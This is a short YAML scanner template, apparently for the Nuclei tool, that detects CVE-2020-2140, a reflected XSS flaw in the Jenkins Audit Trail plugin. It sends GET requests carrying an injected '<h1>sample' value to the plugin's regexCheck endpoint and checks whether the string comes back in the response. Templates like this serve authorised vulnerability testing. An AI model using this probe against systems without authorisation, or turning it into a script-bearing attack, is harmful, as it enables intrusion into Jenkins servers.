23 lines
542 B
YAML
23 lines
542 B
YAML
|
id: CVE-2020-2140
|
||
|
info:
|
||
|
author: j3ssie/geraldino2
|
||
|
description: Jenkin rXSS vulnerability
|
||
|
name: Jenkin Audit XSS
|
||
|
severity: medium
|
||
|
requests:
|
||
|
- matchers:
|
||
|
- status:
|
||
|
- 200
|
||
|
type: status
|
||
|
- part: body
|
||
|
type: word
|
||
|
words:
|
||
|
- <h1>sample
|
||
|
matchers-condition: and
|
||
|
method: GET
|
||
|
path:
|
||
|
- >-
|
||
|
{{BaseURL}}/descriptorByName/AuditTrailPlugin/regexCheck?value=*j<h1>sample
|
||
|
- >-
|
||
|
{{BaseURL}}/jenkins/descriptorByName/AuditTrailPlugin/regexCheck?value=*j<h1>sample
|